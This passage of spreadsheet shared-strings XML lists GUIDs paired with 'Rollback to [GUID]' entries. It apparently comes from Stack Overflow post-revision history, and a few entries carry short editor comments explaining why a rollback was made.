    <t>65297826-52be-4242-b2cc-9c787aa18cb4</t>
  </si>
  <si>
    <t>Rollback to [a39b251c-15c3-4fd7-acfd-93f815370ab9]</t>
  </si>
  <si>
    <t>b4cf95ff-1840-4d9d-97aa-f0530469936b</t>
  </si>
  <si>
    <t>Rollback to [1d53b8b7-2b82-4c8b-a419-4cd7c7e4aa45]</t>
  </si>
  <si>
    <t>30c8c636-0eed-490f-8a69-79ff345f3bea</t>
  </si>
  <si>
    <t>Rollback to [a542c6cd-a4db-4a67-af2f-c487cbac624e]</t>
  </si>
  <si>
    <t>a9bb227a-a374-4397-bab3-44fc571215a9</t>
  </si>
  <si>
    <t>Rollback to [f4f5789c-99e1-417c-aed6-c30725abd61b]</t>
  </si>
  <si>
    <t>dfd34371-0c27-4340-86d2-7c99e85906d2</t>
  </si>
  <si>
    <t>Rollback to [c8acdae9-6f5b-4281-ab77-79bd4ff99522]</t>
  </si>
  <si>
    <t>bcc7122b-17a7-4f05-a5f6-e6fa92dc47ff</t>
  </si>
  <si>
    <t>Rollback to [f3876471-72fc-4dcc-92a0-6ce51746d3b3]</t>
  </si>
  <si>
    <t>8a083f26-42ad-406f-bcb7-5113bd8bc3a2</t>
  </si>
  <si>
    <t>Rollback to [f20d30d0-5ec5-4358-8001-66600ba05a40] - rollback</t>
  </si>
  <si>
    <t>3d15ac40-7135-464e-8754-8de679439876</t>
  </si>
  <si>
    <t>Rollback to [993ba56c-7df9-4eb9-b496-3d15548f1d8f]</t>
  </si>
  <si>
    <t>fc64317b-cdb1-4d3d-85d0-cb84920e958a</t>
  </si>
  <si>
    <t>Rollback to [ad3ca705-43d9-4ef8-9b2b-f3c1d2b98971]</t>
  </si>
  <si>
    <t>e7763dcc-4891-460a-b1ae-7896f8ad0f5d</t>
  </si>
  <si>
    <t>Rollback to [4281d539-fb96-4422-948e-0ed9d7288176]</t>
  </si>
  <si>
    <t>5a0f8fb1-bf3d-40d0-a4f9-fd14ade81c3c</t>
  </si>
  <si>
    <t>Rollback to [9DB1F07F-28B9-4C6A-B936-4BDCAF8E4DFC]</t>
  </si>
  <si>
    <t>aebc79bd-81a8-46ef-84b1-67a33423cc88</t>
  </si>
  <si>
    <t>Rollback to [E77C7EB7-0625-412E-A2F6-089A4E412B63]</t>
  </si>
  <si>
    <t>ff7092c7-8a3a-4b9c-8205-d9137cf652c0</t>
  </si>
  <si>
    <t>Rollback to [366600a3-8c3a-46e6-9beb-5f6f2b740b04]</t>
  </si>
  <si>
    <t>6506910a-1482-471a-badb-73a7f1fedaa9</t>
  </si>
  <si>
    <t>Rollback to [89B5D531-56FC-4645-B574-BD87E36F3B07]</t>
  </si>
  <si>
    <t>74a03635-7581-48a4-b35c-94061f4d8103</t>
  </si>
  <si>
    <t>Rollback to [704c8d61-35dc-49be-a595-daed40b6494d]</t>
  </si>
  <si>
    <t>081f842c-dff4-48ab-938b-1a8dc1e89c4c</t>
  </si>
  <si>
    <t>Rollback to [aa767ec6-7965-4add-b935-47dd987df347] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>9b58f270-6962-498d-9f8c-8c207f98f95c</t>
  </si>
  <si>
    <t>Rollback to [BF8C2B8F-6542-4E7D-8720-FABA7CC07837]</t>
  </si>
  <si>
    <t>fd93fae9-2132-4205-be72-62e5ef930d16</t>
  </si>
  <si>
    <t>Rollback to [20c5c124-9317-4e2c-8738-65b4aa40bdb4]</t>
  </si>
  <si>
    <t>be00372f-6ea2-41d3-8946-f50b4f5d484b</t>
  </si>
  <si>
    <t>Rollback to [01AAE5AE-EEBA-4924-8771-8B77F194F04E]</t>
  </si>
  <si>
    <t>ea197453-c94e-4480-acae-e93ad904d1b0</t>
  </si>
  <si>
    <t>Rollback to [4895633f-61dc-4614-a7bc-62e4dc8a02a1]</t>
  </si>
  <si>
    <t>986418d3-baba-4908-a21d-fdff43929153</t>
  </si>
  <si>
    <t>Rollback to [3504aa4b-458c-4e5a-9e67-f5e62bdaa4d8]</t>
  </si>
  <si>
    <t>5398f108-b973-4d16-bbb8-bd483a0210c3</t>
  </si>
  <si>
    <t>Rollback to [1db94f48-4910-4e7f-b73a-2f66c74947df]</t>
  </si>
  <si>
    <t>531064dd-5071-41ea-a368-8df1a1cb58a8</t>
  </si>
  <si>
    <t>Rollback to [F4FD5A8E-D93D-4434-8DBF-AEE9400B39A9]</t>
  </si>
  <si>
    <t>54518d0d-ce0a-42c5-9c0c-f0230ddb12ef</t>
  </si>
  <si>
    <t>Rollback to [0D230295-CBFE-4FD8-B672-1F73CB686650]</t>
  </si>
  <si>
    <t>f1f77961-0354-44fa-ae3d-686baa713d27</t>
  </si>
  <si>
    <t>Rollback to [697b6241-a22d-42df-8ee4-c4b92a8f6f3b]</t>
  </si>
  <si>
    <t>53e4992a-0e64-47bd-bd87-1188ff7d8ad5</t>
  </si>
  <si>
    <t>Rollback to [3D36380F-1D27-4A7E-9FC6-87E4F10E1CAA]</t>
  </si>
  <si>
    <t>6af66b95-9986-4694-8131-bc68d8cf75e1</t>
  </si>
  <si>
    <t>Rollback to [b7f1ffa6-ca5b-4a62-b797-304ef62b8166]</t>
  </si>
  <si>
    <t>0680c72b-13ee-4f35-9159-590220fab9be</t>
  </si>
  <si>
    <t>Rollback to [E4328E7D-0BF8-49D7-B262-7FD253656486]</t>
  </si>
  <si>
    <t>fe68cf65-bf83-44d4-bf27-c745d268985b</t>
  </si>
  <si>
    <t>Rollback to [1673A481-6185-4034-82CC-86D977D89E71]</t>
  </si>
  <si>
    <t>d97f3929-a352-4fac-9170-a9c4ec8fc26b</t>
  </si>
  <si>
    <t>Rollback to [7796d11a-065c-469f-81fd-a50e6d45909d]</t>
  </si>
  <si>
    <t>4ea02153-6e6e-4d0f-8349-d543375aa428</t>
  </si>
  <si>
    <t>Rollback to [633fcd4c-3503-4fb8-ab18-6b48db5e30fb]</t>
  </si>
  <si>
    <t>32eb3f36-ae09-40d5-8135-08e8e81566c7</t>
  </si>
  <si>
    <t>Rollback to [9aa815c0-0c97-4d85-8311-73b52cf479a6]</t>
  </si>
  <si>
    <t>26206756-8a09-47ba-94c2-ab1fe9079251</t>
  </si>
  <si>
    <t>Rollback to [883e858a-8b7d-434b-a75b-d204242e2b07]</t>
  </si>
  <si>
    <t>86cc3d7f-0406-4a37-a9cf-e7416ce079c0</t>
  </si>
  <si>
    <t>Rollback to [b8a34dcf-ae84-4a49-8e42-c9eb0c86915b] - rolled back to an actual answer.</t>
  </si>
  <si>
    <t>fe0e9870-be22-410a-ad82-9a723e3a346d</t>
  </si>
  <si>
    <t>Rollback to [f152309d-2b88-4cce-8206-5eb24e10ae4f]</t>
  </si>
  <si>
    <t>497c981e-5988-4369-90c2-85223a3d82ad</t>
  </si>
  <si>
    <t>Rollback to [52877333-6e0b-4885-b982-32ec8611d836]</t>
  </si>
  <si>
    <t>d0ce0652-2305-48c1-89b6-071e951abfdf</t>
  </si>
  <si>
    <t>Rollback to [d2180237-1f32-4f14-ac7c-f54543180a70]</t>
  </si>
  <si>
    <t>3271e1ab-58b6-4d70-bd52-3fec0b8a1ceb</t>
  </si>
  <si>
    <t>Rollback to [f122ee68-c256-4a4a-8e22-ae52bb022274]</t>
  </si>
  <si>
    <t>cadccd9d-83b3-46e2-8db1-4e96db1e32d6</t>
  </si>
  <si>
    <t>Rollback to [c161d3e0-ad51-4515-95b0-a2d71ba46090]</t>
  </si>
  <si>
    <t>ac014899-b0ea-4110-aa4a-f2b9c73128d8</t>
  </si>
  <si>
    <t>Rollback to [5c89c38b-27a9-478b-b3d5-a0d509d786b9]</t>
  </si>
  <si>
    <t>8de83104-baaf-4f0c-80db-0508dca40257</t>
  </si>
  <si>
    <t>Rollback to [2782b9e6-b15e-4fe9-966c-181dae4963ad]</t>
  </si>
  <si>
    <t>c3f71057-67b3-4f3c-94d1-951ceddafd47</t>
  </si>
  <si>
    <t>Rollback to [2561FBF4-55BE-49D7-97EE-8DD9CB8DADCE]</t>
  </si>
  <si>
    <t>1fda41d0-d00b-4ad2-afa9-d845732d161c</t>
  </si>
  <si>
    <t>Rollback to [6726D820-4D4A-4E33-B27B-DAFF8A5D691E]</t>
  </si>
  <si>
    <t>a9650330-f4e5-4ebf-9f16-09ff43af4257</t>
  </si>
  <si>
    <t>Rollback to [6b9ce4c9-670b-4dd7-8f64-f0cdbe9c2604]</t>
  </si>
  <si>
    <t>19379377-fba1-4a55-9c62-827900b6cd3a</t>
  </si>
  <si>
    <t>Rollback to [b64c52f2-1aa0-47b9-a6b9-8bda6db4179f]</t>
  </si>
  <si>
    <t>719b48c3-9a03-4cfb-a5f0-1c40f2313fe4</t>
  </si>
  <si>
    <t>Rollback to [D8F052C4-08DA-4FE0-8F04-46866F9C1450]</t>
  </si>
  <si>
    <t>e8cbfb7e-1389-4d86-9c62-ed56086b5d34</t>
  </si>
  <si>
    <t>Rollback to [08cf1796-1516-43fe-a0ad-14f7073b7d13]</t>
  </si>
  <si>
    <t>a6256c33-015e-4547-99cc-29d4a26f7afd</t>
  </si>
  <si>
    <t>Rollback to [BC3A0194-8A07-4593-AB85-BC99A6B64E96]</t>
  </si>
  <si>
    <t>db9ec5b7-d6ba-48a0-8381-8a3ca05c2b60</t>
  </si>
  <si>
    <t>Rollback to [EBE1B67D-D797-4D0A-A8E2-4308F792452F]</t>
  </si>
  <si>
    <t>dee6fdec-88e1-4cd7-bb4a-e1bc6c939252</t>
  </si>
  <si>
    <t>Rollback to [d2f531ef-2b7f-4743-aa63-55076c1a74ea]</t>
  </si>
  <si>
    <t>0fe049ac-3ba9-4758-9af1-876a31e11cb0</t>
  </si>
  <si>
    <t>Rollback to [a142def2-05f7-4830-831f-dc9584c448cd] - rolled it back since test shows code works as intended and stated.</t>
  </si>
  <si>
    <t>d629f850-5c37-4d6f-8e41-4332396cbc91</t>
  </si>
  <si>
    <t>Rollback to [314b7f37-ec52-4da7-b1c6-dadfc20fe24f]</t>
  </si>
  <si>
    <t>ee3c881a-69a1-4377-aeaf-583ae9fed178</t>
  </si>
  <si>
    <t>Rollback to [77fa4f98-6bec-4a5a-a5c3-7ee98367f788]</t>
  </si>
  <si>
    <t>ece974cf-711a-47e6-b73f-9528dc2d0219</t>
  </si>
  <si>
    <t>Rollback to [3D6984C4-5706-434B-9813-767F5120BE61]</t>
  </si>
  <si>
    <t>527bff7f-ffa5-4b57-8112-697c806bf070</t>
  </si>
  <si>
    <t>Rollback to [c0b6af60-1eca-4bbb-ab15-ecab7e84c0f8] - I'm rolling back blorgbeards changes because it's preferrable to have it all on one line for copy/paste into the SVN configuration file (which doesn't accept multi-line input).</t>
  </si>
  <si>
    <t>28680dd8-28e9-41d1-b3f1-d0c4f4b9b145</t>
  </si>
  <si>
    <t>Rollback to [dd5387d7-5b0d-4c0b-8c73-a9817b332cf8]</t>
  </si>
  <si>
    <t>d7f3dc3f-556c-4823-8bcd-56ad1e096c78</t>
  </si>
  <si>
    <t>Rollback to [d1d486d7-8adc-462b-91c2-51642e9ee32f] - don't touch my answers, leave a comment</t>
  </si>
  <si>
    <t>1d812933-37b9-4366-89c4-0ee46a301683</t>
  </si>
  <si>
    <t>Rollback to [B8C9A041-74EF-4DFB-B938-95E281D32265]</t>
  </si>
  <si>
    <t>981b62ee-c42a-4abd-a510-945caa4e688d</t>
  </si>
  <si>
    <t>Rollback to [2F0CF28A-9FCC-4402-90D9-FA50033BE5B1]</t>
  </si>
  <si>
    <t>c4dd8504-1562-43ad-bd8a-a208d2ec263e</t>
  </si>
  <si>
    <t>Rollback to [F6751CD2-F76B-4EC1-AD2D-B8B423D0D6A0]</t>
  </si>
  <si>
    <t>9384d7df-86c7-4b30-8f63-f25090f9f297</t>
  </si>
  <si>
    <t>Rollback to [e8cd197c-594c-4143-9c21-0af983aebd20]</t>
  </si>
  <si>
    <t>fcc24668-9d70-4dd5-9847-3947b7bb7bf3</t>
  </si>
  <si>
    <t>Rollback to [0d57aeff-06bc-48b8-acb1-120a09d8e28d]</t>
  </si>
  <si>
    <t>a0396270-0e58-4a97-90fd-535901fecb7f</t>
  </si>
  <si>
    <t>Rollback to [35284FAC-D93F-4C6B-8AA5-FDDCAC51ADC7]</t>
  </si>
  <si>
    <t>d87d24ae-9c91-417c-883c-f1542812685c</t>
  </si>
  <si>
    <t>Rollback to [6434EB72-AA03-4ABD-89D8-C0B822695DD9]</t>
  </si>
  <si>
    <t>e0bf0665-8aca-42ac-aae0-1983c36d146b</t>
  </si>
  <si>
    <t>Rollback to [92d41685-67fa-4a2c-bbd0-16a42be4a353]</t>
  </si>
  <si>
    <t>27466c19-deeb-429f-a914-53523810132d</t>
  </si>
  <si>
    <t>Rollback to [2924b765-8011-4b50-970e-3161aae40be6]</t>
  </si>
  <si>
    <t>4cddc0f9-e049-49d2-8654-8d89819b489f</t>
  </si>
  <si>
    <t>Rollback to [29369581-9eb4-4eb9-bbb8-85836f84eae1]</t>
  </si>
  <si>
    <t>8c2f3606-8bd4-408d-83e8-438709e9a83e</t>
  </si>
  <si>
    <t>Rollback to [DF0355E6-EF1C-4159-9FFE-A6270E454FAE]</t>
  </si>
  <si>
    <t>75bbeccf-8612-4f1c-8f83-4aad484d5386</t>
  </si>
  <si>
    <t>Rollback to [9465EE13-CE03-41B9-ABF1-4016AE29B90D]</t>
  </si>
  <si>
    <t>9b6491f5-1881-4df0-8b3e-ee95002d2d4d</t>
  </si>
  <si>
    <t>Rollback to [702f896f-bff8-45f1-bed4-54daa3071194]</t>
  </si>
  <si>
    <t>e831b2c8-ae8f-4c40-97f0-f19210812958</t>
  </si>
  <si>
    <t>Rollback to [fdcd303e-9881-41d2-9e4f-947373ddc873]</t>
  </si>
  <si>
    <t>e8c3295b-6f46-479f-ad6c-7cddc7eb24c5</t>
  </si>
  <si>
    <t>Rollback to [7ab4900b-d1b2-46b5-9d59-92c91159a80f]</t>
  </si>
  <si>
    <t>eb3cbc87-c8b9-41a0-9a1a-168a455a3388</t>
  </si>
  <si>
    <t>Rollback to [f497791a-f9d1-42d8-9a6c-cbd8fc7cbbed]</t>
  </si>
  <si>
    <t>eb876c46-7a4a-4337-bfbc-79332712f6bf</t>
  </si>
  <si>
    <t>Rollback to [61045dd3-bbbf-4f03-9a07-2a4ca89653fd]</t>
  </si>
  <si>
    <t>615b5b58-9734-4cb8-8481-52a57ede0918</t>
  </si>
  <si>
    <t>Rollback to [86876440-c752-49bd-bedf-625cf4605d38]</t>
  </si>
  <si>
    <t>494a2a73-87b5-44c4-ae9e-4072e42fc8a1</t>
  </si>
  <si>
    <t>Rollback to [64d7d973-48a2-4a83-81fc-904cbf6b3f3b]</t>
  </si>
  <si>
    <t>043122e3-7d51-4a06-b487-c2fd9d48bbed</t>
  </si>
  <si>
    <t>Rollback to [03a6f446-a856-4179-961c-2192cb415074]</t>
  </si>
  <si>
    <t>09aea4a0-2b61-42e3-9144-c58d36b46b0f</t>
  </si>
  <si>
    <t>Rollback to [44c42294-b81d-475e-ac54-bd215fce2d4a]</t>
  </si>
  <si>
    <t>22785acf-7a49-411e-9a7e-1ecb0569b22c</t>
  </si>
  <si>
    <t>Rollback to [109b7cf2-51b6-42c8-ad90-a18a39e5f70e]</t>
  </si>
  <si>
    <t>38d9b48e-a63c-4748-8279-b8bffeab9b2d</t>
  </si>
  <si>
    <t>Rollback to [a7262c1c-a3f1-4e81-9fb4-0fbd37ec6da6]</t>
  </si>
  <si>
    <t>fe0ec0f8-c219-4606-8b18-39e91d0b3ad3</t>
  </si>
  <si>
    <t>Rollback to [af13d7c6-64f4-4502-95d5-7a2e603139b9]</t>
  </si>
  <si>
    <t>4a073b5e-fed2-425d-82e2-b6ae20d3eca7</t>
  </si>
  <si>
    <t>Rollback to [250af6b8-7220-40cf-9620-89a7b6bd297a]</t>
  </si>
  <si>
    <t>19a2e410-a7b5-47fa-a61b-4c554063ff80</t>
  </si>
  <si>
    <t>Rollback to [7B0DF084-777E-4558-B8FA-18A4743132C5]</t>
  </si>
  <si>
    <t>af1aaf66-dbaa-45c1-9fda-c883ac3b516f</t>
  </si>
  <si>
    <t>Rollback to [CEA0EDFC-E06D-43F8-BBA9-F933D86AFD2A]</t>
  </si>
  <si>
    <t>759e08d5-9517-4241-b860-54405e6e7be7</t>
  </si>
  <si>
    <t>Rollback to [1d22cc3d-74e2-4c26-ba94-fd94cb42e675]</t>
  </si>
  <si>
    <t>d7dfa47f-f30c-4c3f-bba5-577366027618</t>
  </si>
  <si>
    <t>Rollback to [E5995FA1-488F-4D34-9F49-DECD43010969]</t>
  </si>
  <si>
    <t>2e807a2d-5963-4070-a56b-57f72379cc44</t>
  </si>
  <si>
    <t>Rollback to [E403F6D4-D4AB-4DAC-A492-B0AB01A48182]</t>
  </si>
  <si>
    <t>c08ec8c7-ebd1-4d8b-adf8-80a7fb0c42b1</t>
  </si>
  <si>
    <t>Rollback to [4F9CDD6C-FD28-4A2D-9862-4401FDC5E0A3]</t>
  </si>
  <si>
    <t>81983f66-d99c-45f1-9d0b-fcd12a4da634</t>
  </si>
  <si>
    <t>Rollback to [d03b64b0-9ed0-4e98-814d-9d8605fb208d]</t>
  </si>
  <si>
    <t>dd07be7a-6371-4593-95e2-3048275dfdc7</t>
  </si>
  <si>
    <t>Rollback to [3e41241e-23e4-47bf-95b2-6c7d930ab8ab]</t>
  </si>
  <si>
    <t>66678803-aeef-46af-9c5b-4dfb9e932425</t>
  </si>
  <si>
    <t>Rollback to [7a47fe0b-1c2f-4398-854a-0cf1ae1dc781]</t>
  </si>
  <si>
    <t>6c1a9b55-1d96-492c-8d96-e7a797a3b4cc</t>
  </si>
  <si>
    <t>Rollback to [5b3e8a45-64b3-456c-8ca2-69437619514e]</t>
  </si>
  <si>
    <t>28e71f07-371f-4bc0-8526-75d49b37eccc</t>
  </si>
  <si>
    <t>Rollback to [3ff3f68d-cfda-44ac-ae51-1a76ee94a14c]</t>
  </si>
  <si>
    <t>c5657cd2-b0a0-4586-bd1e-e78a7edc38de</t>
  </si>
  <si>
    <t>Rollback to [0fcb2846-47a8-4fea-91b8-59d70170c529]</t>
  </si>
  <si>
    <t>311513a6-94ca-4bc2-be6c-b839b92df6e7</t>
  </si>
  <si>
    <t>Rollback to [ac5f6775-c071-4685-8445-9dfea432da01]</t>
  </si>
  <si>
    <t>9099e962-e55d-40b8-8ef1-d06a84c4ff68</t>
  </si>
  <si>
    <t>Rollback to [7a927b73-9a01-4c52-8d38-c22a1ba3ecac]</t>
  </si>
  <si>
    <t>619672f2-dea1-49bb-8c61-a43f77092f9e</t>
  </si>
  <si>
    <t>Rollback to [937c2cea-a817-4506-96d9-642319b42dc1]</t>
  </si>
  <si>
    <t>336f13f5-fdcd-45ad-aea7-597680000eae</t>
  </si>
  <si>
    <t>Rollback to [6afbb015-458d-4f61-bbdd-214e253e8d44]</t>
  </si>
  <si>
    <t>f90c194d-7636-4180-b58d-1fc67f07d711</t>
  </si>
  <si>
    <t>Rollback to [2694b860-de40-40b8-a059-c40ce6791dbc]</t>
  </si>
  <si>
    <t>a2c70f88-fa88-4f91-b5a7-ccdfff5bb208</t>
  </si>
  <si>
    <t>Rollback to [83fad55a-350e-4945-9a1d-f1fae07c5ff2]</t>
  </si>
  <si>
    <t>7a0077ea-25c6-4208-83e8-5788b58f5083</t>
  </si>
  <si>
    <t>Rollback to [e28a45f1-f91a-48b0-ab7d-9219897bb83f]</t>
  </si>
  <si>
    <t>ec3c62a8-80fc-4382-b860-6c1762ee2d3f</t>
  </si>
  <si>
    <t>Rollback to [5daa11dd-ee60-4228-aadd-978cf10ba039]</t>
  </si>
  <si>
    <t>55547f72-ca53-4fc7-be57-fc6337f98fa8</t>
  </si>
  <si>
    <t>Rollback to [f1265ca8-18bc-4c94-9214-69ed230d4e19]</t>
  </si>
  <si>
    <t>16ee5c03-b44b-4bf6-baf1-bf70a632ac5b</t>
  </si>
  <si>
    <t>Rollback to [5034b8e1-91a0-4644-ab8e-d87696611d2a]</t>
  </si>
  <si>
    <t>34d06367-4c54-4be2-9789-1c741ac40788</t>
  </si>
  <si>
    <t>Rollback to [ac32776b-6563-41a2-b413-5e0483ea9a7f]</t>
  </si>
  <si>
    <t>9515c4e3-8171-407c-8506-535ebebc593f</t>
  </si>
  <si>
    <t>Rollback to [6a9c1aee-f794-4e43-a25f-b18348c0d00b]</t>
  </si>
  <si>
    <t>75579678-02cd-4ad4-ab39-b3187ebe0c95</t>
  </si>
  <si>
    <t>Rollback to [30552fda-d7d2-401f-bcda-f3603001f6de]</t>
  </si>
  <si>
    <t>d95940c1-4f32-4a98-ab6e-d84a78c98c50</t>
  </si>
  <si>
    <t>Rollback to [afc06101-0c07-40fe-96f0-caa6b7274e5d]</t>
  </si>
  <si>
    <t>80e25375-c6cc-462b-a1b4-f263223a683d</t>
  </si>
  <si>
    <t>Rollback to [6D6EC72F-47D0-4049-8618-1253729B1CDB]</t>
  </si>
  <si>
    <t>108c2c4f-c230-428f-9443-4e286f9c5d02</t>
  </si>
  <si>
    <t>Rollback to [A6A61678-DFB5-4A71-9D1D-B91F21E53F93]</t>
  </si>
  <si>
    <t>a4a6bf5d-b109-4854-b56a-016d800968eb</t>
  </si>
  <si>
    <t>Rollback to [67bbfaf7-e55f-4d24-ac6e-33a8fdf13a29] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>5bda2f70-9c50-420c-b63e-c43f59165a0b</t>
  </si>
  <si>
    <t>Rollback to [4d5df2c3-af94-4d1e-8d6d-4c7b7d989bd2]</t>
  </si>
  <si>
    <t>4ca6c9ae-b943-4a82-8e97-bf7acd787bf7</t>
  </si>
  <si>
    <t>Rollback to [7585E7B7-D763-471C-A6ED-419FD6A3128C]</t>
  </si>
  <si>
    <t>7de80972-8c64-4872-9a50-10f98619a32f</t>
  </si>
  <si>
    <t>Rollback to [611295e9-956a-4cac-8597-07ce928dd3c9]</t>
  </si>
  <si>
    <t>0b302726-e169-4278-b108-1d29758c58ae</t>
  </si>
  <si>
    <t>Rollback to [720C91CB-D302-4BE7-B8B1-1CB2265183A0]</t>
  </si>
  <si>
    <t>b2dc7467-1bf0-4220-9909-d2d24e9a6d6b</t>
  </si>
  <si>
    <t>Rollback to [52E899B6-F3E5-464F-AE8B-7D23B3969064]</t>
  </si>
  <si>
    <t>3b40bd15-5a49-47bd-97ec-210d603eef48</t>
  </si>
  <si>
    <t>Rollback to [205f7ef9-076b-4131-af75-fcdf968e3b88]</t>
  </si>
  <si>
    <t>8f7c13c7-e843-49c4-bdff-254b16c4e1e7</t>
  </si>
  <si>
    <t>Rollback to [0e7e264d-e2cb-48ae-bfcc-7e4e7512d5e7]</t>
  </si>
  <si>
    <t>2d392497-56ec-495a-a8a5-a56f853c1be5</t>
  </si>
  <si>
    <t>Rollback to [c09505ac-89f9-4ab7-85a2-e2cacd12ae1f]</t>
  </si>
  <si>
    <t>3122df8c-bb1e-4536-aedc-3d9c3286ac1d</t>
  </si>
  <si>
    <t>Rollback to [0CBC8E81-4721-4800-B38D-8707890B026C]</t>
  </si>
  <si>
    <t>1d1b6f5c-0eb1-4338-a9df-10e1328de3f3</t>
  </si>
  <si>
    <t>Rollback to [6a244f91-5b1f-4144-a104-50ec722a9fb2]</t>
  </si>
  <si>
    <t>b64d9b5f-fc11-4b7e-84f4-2634bb7f184a</t>
  </si>
  <si>
    <t>Rollback to [109b8912-bbd1-4f1f-a6e1-e894961f1cfc]</t>
  </si>
  <si>
    <t>b6420fbf-9dcd-4203-a54d-cdaf67ce0c5f</t>
  </si>
  <si>
    <t>Rollback to [e4e148c4-9199-46bc-b35e-43aace5c0312]</t>
  </si>
  <si>
    <t>4deac73b-de64-4add-a622-b1aa076ad679</t>
  </si>
  <si>
    <t>Rollback to [59E5C124-E73F-441A-AA25-3203F8D8255E]</t>
  </si>
  <si>
    <t>3b66d26d-9ddd-42b4-94f2-cf056201f0b8</t>
  </si>
  <si>
    <t>Rollback to [b48ebb0a-b765-4e78-8b6e-0ced64d2db64] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>2b727277-7759-4d04-a1b4-e9025ca679ae</t>
  </si>
  <si>
    <t>Rollback to [075ea76b-7065-4f3a-b61d-522ce1514e91]</t>
  </si>
  <si>
    <t>eebab4b5-a2c0-4f90-8800-1b15c395f4b5</t>
  </si>
  <si>
    <t>Rollback to [b0e927a6-0ad9-4c27-8b02-2807a0f5628f]</t>
  </si>
  <si>
    <t>9a974dd6-82e7-4b37-b927-90b43174de2d</t>
  </si>
  <si>
    <t>Rollback to [BCFF9377-0C67-4DA5-B1ED-92861FE6670A]</t>
  </si>
  <si>
    <t>522e6f7a-369e-4fa8-b07a-8a0c89b8ac42</t>
  </si>
  <si>
    <t>Rollback to [48739f29-ed29-4dd5-8138-48b0eea00174]</t>
  </si>
  <si>
    <t>76363688-7e58-441b-831f-98c08d45acc6</t>
  </si>
  <si>
    <t>Rollback to [be135b47-fb1d-4957-bc7b-555f382e4e09] - The last edit removed the part that answered the question which says "I can never remember that number. I need a memory rule." Besides, it's the author's intention to keep that sentence, as can be seen in revision 5 of the post (http://stackoverflow.com/posts/94608/revisions).</t>
  </si>
  <si>
    <t>5e082d60-59ce-467b-97ea-f90efef17651</t>
  </si>
  <si>
    <t>Rollback to [B46AFD78-8CA2-4039-94A3-14B8577AC5EC]</t>
  </si>
  <si>
    <t>76d99ebe-c19b-4a35-bf6f-ac71d85c673f</t>
  </si>
  <si>
    <t>Rollback to [a1c01dd6-1d53-4c85-99b3-db92ad6efb5c] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>8f7b0560-b8f0-4be6-9ad5-6e54eaa3aae6</t>
  </si>
  <si>
    <t>Rollback to [bf2b8f05-1e1f-425e-b8be-a0de61f546dc] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>d898dadb-de2c-4892-b72e-74b2811134c3</t>
  </si>
  <si>
    <t>Rollback to [AB1A67C3-827C-4116-AC09-23AF9F10FEE5]</t>
  </si>
  <si>
    <t>9271e170-5db6-4705-bd71-27bac45da569</t>
  </si>
  <si>
    <t>Rollback to [85c599b1-6207-4472-a0ce-6813926c3a57]</t>
  </si>
  <si>
    <t>04346699-e6a4-4055-b4bf-e551dd0b0712</t>
  </si>
  <si>
    <t>Rollback to [b20592d4-99ea-498e-892c-a42758db72e7] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>de291738-c8b5-4feb-96bc-4dfeb8fd7d3c</t>
  </si>
  <si>
    <t>Rollback to [5D4B7ECC-6F9F-4A6E-9C9A-94E84972DB52]</t>
  </si>
  <si>
    <t>7f759b30-4602-4d1e-a4da-a2ee7647e526</t>
  </si>
  <si>
    <t>Rollback to [F5959A19-2DF9-4B94-9D85-35A49C960A14]</t>
  </si>
  <si>
    <t>bfd1a9e0-4558-40ab-830c-19bc571ed4ff</t>
  </si>
  <si>
    <t>Rollback to [a1ee6eff-d1a6-41f5-97b2-09658a166b4a]</t>
  </si>
  <si>
    <t>d66d395b-8b34-46d5-a0f2-b36e4615a042</t>
  </si>
  <si>
    <t>Rollback to [c4d18769-88b1-483c-adfc-8cb3f70b298d]</t>
  </si>
  <si>
    <t>c1e62230-7e56-430a-86a4-ce1ad3c56426</t>
  </si>
  <si>
    <t>Rollback to [385db3c6-308a-4e9b-9c36-8206d36c095b]</t>
  </si>
  <si>
    <t>4268f5a9-638d-4418-baa8-4cd6cc5f61fa</t>
  </si>
  <si>
    <t>Rollback to [B25303A6-1D4C-4126-AD79-FF084B178781]</t>
  </si>
  <si>
    <t>5be12e67-2f08-4d20-80e4-e5aed863ac9f</t>
  </si>
  <si>
    <t>Rollback to [480DCE2F-A5B5-403D-8E15-F4A4CB258885]</t>
  </si>
  <si>
    <t>4294d954-b7f6-4f2d-a7fc-3bda43562c1a</t>
  </si>
  <si>
    <t>Rollback to [f150fc46-486e-4152-9994-bcb552617186] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>0baf625f-2282-4ca1-9546-c43d7bbae715</t>
  </si>
  <si>
    <t>Rollback to [0c0819d4-51fd-43d7-84c6-855db48b6fb5]</t>
  </si>
  <si>
    <t>1d3388dc-5953-415b-bcd0-af1034307305</t>
  </si>
  <si>
    <t>Rollback to [af12d2a5-4a38-4ae4-a570-b2284ab6cc9f]</t>
  </si>
  <si>
    <t>9cb54f63-919f-4668-bc3d-c72ffa8f299b</t>
  </si>
  <si>
    <t>Rollback to [a6728c42-3272-4e50-a437-fe3213505234]</t>
  </si>
  <si>
    <t>7f2f4edf-40a6-4b2e-826d-68389aa11bb5</t>
  </si>
  <si>
    <t>Rollback to [49934fc5-459d-4626-b0f5-694249aa7f44]</t>
  </si>
  <si>
    <t>55ed7945-9c4a-4774-9224-b9e3c9dcbef8</t>
  </si>
  <si>
    <t>Rollback to [7FA7DFDE-5432-4535-9A47-9A08F2F82B74]</t>
  </si>
  <si>
    <t>4c0659d0-57a0-4347-8960-9161d2fde40c</t>
  </si>
  <si>
    <t>Rollback to [fbbd3fba-40c0-4855-bca4-3c3f04e3e0f0]</t>
  </si>
  <si>
    <t>63a49f54-c3f0-4323-a459-43b3e56d20e1</t>
  </si>
  <si>
    <t>Rollback to [476ab2b3-8ebc-4181-b1c1-b0a9a1ed1070]</t>
  </si>
  <si>
    <t>b1b6e722-06b9-4ea4-9b57-e276791b01f5</t>
  </si>
  <si>
    <t>Rollback to [A9AA6B1E-C7C5-464C-85DF-F1FFDA881965]</t>
  </si>
  <si>
    <t>82db6f09-c384-4086-b270-98f3dfef2085</t>
  </si>
  <si>
    <t>Rollback to [4e32c1e2-8dd1-45da-a9a3-b427d15442ef]</t>
  </si>
  <si>
    <t>6809a1f1-48a6-4abb-9312-2235a838d239</t>
  </si>
  <si>
